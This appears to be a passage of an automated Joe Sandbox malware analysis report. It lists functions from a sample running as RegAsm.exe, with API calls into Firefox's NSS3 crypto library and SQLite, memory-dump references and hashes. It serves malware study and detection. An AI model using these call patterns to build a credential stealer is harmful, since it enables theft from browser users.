                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memsetsqlite3_log
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                        • API String ID: 984749767-598938438
                                                                                                        • Opcode ID: b3925f0c5ba2d5655c03de6b83f27b6d5118f3de8e6f307b73127bf22cf9394e
                                                                                                        • Instruction ID: 50e87e92eaee00da975217125805f09c068fb9373c2beff44e0c5e7b22eb4227
                                                                                                        • Opcode Fuzzy Hash: b3925f0c5ba2d5655c03de6b83f27b6d5118f3de8e6f307b73127bf22cf9394e
                                                                                                        • Instruction Fuzzy Hash: 74B1D2B0E052199BCB08CF9DC8C4AEEF7B1BF49304F94406AE825B7B41D3759852CBA0
                                                                                                        Function 6C1A2D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __allrem
                                                                                                        • String ID: @,l$P,l$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$,l
                                                                                                        • API String ID: 2933888876-2868315259
                                                                                                        • Opcode ID: 5af061cd0078f6fb4408b5ac58818c4a26925719a2ce9ba5ff23aa9eff0ab36d
                                                                                                        • Instruction ID: 921c43fef611ef2e91c9432dedfc450e261f51522b0347b669ede8a3c7b2d7b1
                                                                                                        • Opcode Fuzzy Hash: 5af061cd0078f6fb4408b5ac58818c4a26925719a2ce9ba5ff23aa9eff0ab36d
                                                                                                        • Instruction Fuzzy Hash: 4761A075B013089FDB04CFA9DC84AAAB7B5FF49354F10812DE9199BB80DB35AC06CB90
                                                                                                        Function 0041B991 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,039E2548), ref: 0041B9C5
                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0041BA3E
                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BA5A
                                                                                                        • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041BA6E
                                                                                                        • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BA77
                                                                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BA87
                                                                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BAA5
                                                                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BAB5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$PointerRead$HandleInformationSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2979504256-3916222277
                                                                                                        • Opcode ID: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
                                                                                                        • Instruction ID: 2f96ef8e8c352da0c6fd23b8bc0b50d76e073618b9a0ce70252d9e73764e8c17
                                                                                                        • Opcode Fuzzy Hash: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
                                                                                                        • Instruction Fuzzy Hash: 4A51F3B1D0021CAFDB28DF99DC85AEEBBB9EF04344F10442AE511E6260D7789D85CF94
                                                                                                        Function 0040DB7F Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109stringmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0040DBBB
                                                                                                        • strchr.MSVCRT ref: 0040DBCD
                                                                                                        • strchr.MSVCRT ref: 0040DBF2
                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
                                                                                                        • strcpy_s.MSVCRT ref: 0040DC6F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
                                                                                                        • String ID: 0123456789ABCDEF$`Tu
                                                                                                        • API String ID: 453150750-1497512213
                                                                                                        • Opcode ID: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
                                                                                                        • Instruction ID: be699800860e389eb7f033a368984428232de7924aec9246af203248711cb49e
                                                                                                        • Opcode Fuzzy Hash: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
                                                                                                        • Instruction Fuzzy Hash: 18315D71D002199FDB00DFE8DC49ADEBBB9AF09355F100179E901FB281DB79A909CB94
                                                                                                        Function 6C1B0F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C1B0F62
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C1B0F84
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,6C1CF59B,6C2D890C,?), ref: 6C1B0FA8
                                                                                                        • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C1B0FC1
                                                                                                          • Part of subcall function 6C210BE0: malloc.MOZGLUE(6C208D2D,?,00000000,?), ref: 6C210BF8
                                                                                                          • Part of subcall function 6C210BE0: TlsGetValue.KERNEL32(6C208D2D,?,00000000,?), ref: 6C210C15
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C1B0FDB
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1B0FEF
                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C1B1001
                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C1B1009
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                                        • String ID: security
                                                                                                        • API String ID: 2061345354-3315324353
                                                                                                        • Opcode ID: d5d6f3662e5b7b2ad21acffe32019734808aaf05483b4bc202533091b6295057
                                                                                                        • Instruction ID: 2c43538e0b6848c0e5ac665d26ea00742f4f8a6a83b3645fbfc6b555131d563a
                                                                                                        • Opcode Fuzzy Hash: d5d6f3662e5b7b2ad21acffe32019734808aaf05483b4bc202533091b6295057
                                                                                                        • Instruction Fuzzy Hash: ED2136B1A04208ABE7109F24DC81AAFB7B8EF5465CF108519FC1896B01FB31D915CBE2
                                                                                                        Function 6C1B6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,6C1B7D8F,6C1B7D8F,?,?), ref: 6C1B6DC8
                                                                                                          • Part of subcall function 6C20FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C20FE08
                                                                                                          • Part of subcall function 6C20FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C20FE1D
                                                                                                          • Part of subcall function 6C20FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C20FE62
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C1B7D8F,?,?), ref: 6C1B6DD5
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C2D8FA0,00000000,?,?,?,?,6C1B7D8F,?,?), ref: 6C1B6DF7
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C1B6E35
                                                                                                          • Part of subcall function 6C20FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C20FE29
                                                                                                          • Part of subcall function 6C20FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C20FE3D
                                                                                                          • Part of subcall function 6C20FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C20FE6F
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C1B6E4C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21116E
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C2D8FE0,00000000), ref: 6C1B6E82
                                                                                                          • Part of subcall function 6C1B6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C1BB21D,00000000,00000000,6C1BB219,?,6C1B6BFB,00000000,?,00000000,00000000,?,?,?,6C1BB21D), ref: 6C1B6B01
                                                                                                          • Part of subcall function 6C1B6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C1B6B8A
                                                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C1B6F1E
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C1B6F35
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C2D8FE0,00000000), ref: 6C1B6F6B
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,6C1B7D8F,?,?), ref: 6C1B6FE1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 587344769-0
                                                                                                        • Opcode ID: 9fa5f393819a26307c8cf8864681886ca5a1ade2a741018510b84ece3600ceb2
                                                                                                        • Instruction ID: 1230a817c4ccd5e6348643604da235ed0f92d04fc503df52244123c5afd32ea5
                                                                                                        • Opcode Fuzzy Hash: 9fa5f393819a26307c8cf8864681886ca5a1ade2a741018510b84ece3600ceb2
                                                                                                        • Instruction Fuzzy Hash: 0C717F71E1024A9FEB04CF15CD50BAA77A4BF65348F16426AEC08E7B11F770E994CB90
                                                                                                        Function 6C1F0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1F1057
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1F1085
                                                                                                        • PK11_GetAllTokens.NSS3 ref: 6C1F10B1
                                                                                                        • free.MOZGLUE(?), ref: 6C1F1107
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1F1172
                                                                                                        • free.MOZGLUE(?), ref: 6C1F1182
                                                                                                        • free.MOZGLUE(?), ref: 6C1F11A6
                                                                                                        • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C1F11C5
                                                                                                          • Part of subcall function 6C1F52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C1CEAC5,00000001), ref: 6C1F52DF
                                                                                                          • Part of subcall function 6C1F52C0: EnterCriticalSection.KERNEL32(?), ref: 6C1F52F3
                                                                                                          • Part of subcall function 6C1F52C0: PR_Unlock.NSS3(?), ref: 6C1F5358
                                                                                                        • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C1F11D3
                                                                                                        • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C1F11F3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1549229083-0
                                                                                                        • Opcode ID: bef1261d0aa6de4852f9ae0c7e6b871769591bebfc207250d95b94b5e527e2b3
                                                                                                        • Instruction ID: 98d371040fc6e30e0aeb3bc3f1361b3a77e16405323dc29f270eae8f1c3294cd
                                                                                                        • Opcode Fuzzy Hash: bef1261d0aa6de4852f9ae0c7e6b871769591bebfc207250d95b94b5e527e2b3
                                                                                                        • Instruction Fuzzy Hash: D161C2F0E043059BEB00DF64D885B9AB7F5BF19348F244128EC29AB741E731E956CBA1
                                                                                                        Function 6C1FADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE10
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE24
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,6C1DD079,00000000,00000001), ref: 6C1FAE5A
                                                                                                        • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE6F
                                                                                                        • free.MOZGLUE(85145F8B,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE7F
                                                                                                        • TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEB1
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEC9
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEF1
                                                                                                        • free.MOZGLUE(6C1DCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?), ref: 6C1FAF0B
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAF30
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 161582014-0
                                                                                                        • Opcode ID: 9fa23ee7b1edb639dbd2378b8b019058a0306f2b6570c7522cd6306219257da1
                                                                                                        • Instruction ID: 4357749c93473418c751272eaa675316a0cc97f4ee8635c844b498b80e243104
                                                                                                        • Opcode Fuzzy Hash: 9fa23ee7b1edb639dbd2378b8b019058a0306f2b6570c7522cd6306219257da1
                                                                                                        • Instruction Fuzzy Hash: EE519EB5A00601AFDB00DF25D885B5AB7F4FF14318F144265DC289BE12E735E8A5CBE1
                                                                                                        Function 6C1D4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C1DAB7F,?,00000000,?), ref: 6C1D4CB4
                                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6C1DAB7F,?,00000000,?), ref: 6C1D4CC8
                                                                                                        • TlsGetValue.KERNEL32(?,6C1DAB7F,?,00000000,?), ref: 6C1D4CE0
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,6C1DAB7F,?,00000000,?), ref: 6C1D4CF4
                                                                                                        • PL_HashTableLookup.NSS3(?,?,?,6C1DAB7F,?,00000000,?), ref: 6C1D4D03
                                                                                                        • PR_Unlock.NSS3(?,00000000,?), ref: 6C1D4D10
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                        • PR_Now.NSS3(?,00000000,?), ref: 6C1D4D26
                                                                                                          • Part of subcall function 6C279DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C2C0A27), ref: 6C279DC6
                                                                                                          • Part of subcall function 6C279DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C2C0A27), ref: 6C279DD1
                                                                                                          • Part of subcall function 6C279DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C279DED
                                                                                                        • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C1D4D98
                                                                                                        • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C1D4DDA
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C1D4E02
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 4032354334-0
                                                                                                        • Opcode ID: 69ba5bd384e0409b1d98544302b7c8adf6c498d6a62ca2ecb53ca13faea552ba
                                                                                                        • Instruction ID: 7658ca774250d0863709ca6c6e9eca719639d0a1467a71c3dabaced5fd7c60e3
                                                                                                        • Opcode Fuzzy Hash: 69ba5bd384e0409b1d98544302b7c8adf6c498d6a62ca2ecb53ca13faea552ba
                                                                                                        • Instruction Fuzzy Hash: BD4199B6A006059FEB019F68EC44B6B77B8EF2525CF064171EC0987B11EB35E964C7E2
                                                                                                        Function 6C1B2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C1B2CDA,?,00000000), ref: 6C1B2E1E
                                                                                                          • Part of subcall function 6C20FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C1B9003,?), ref: 6C20FD91
                                                                                                          • Part of subcall function 6C20FD80: PORT_Alloc_Util.NSS3(A4686C21,?), ref: 6C20FDA2
                                                                                                          • Part of subcall function 6C20FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C21,?,?), ref: 6C20FDC4
                                                                                                        • SECITEM_DupItem_Util.NSS3(?), ref: 6C1B2E33
                                                                                                          • Part of subcall function 6C20FD80: free.MOZGLUE(00000000,?,?), ref: 6C20FDD1
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1B2E4E
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1B2E5E
                                                                                                        • PL_HashTableLookup.NSS3(?), ref: 6C1B2E71
                                                                                                        • PL_HashTableRemove.NSS3(?), ref: 6C1B2E84
                                                                                                        • PL_HashTableAdd.NSS3(?,00000000), ref: 6C1B2E96
                                                                                                        • PR_Unlock.NSS3 ref: 6C1B2EA9
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1B2EB6
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1B2EC5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
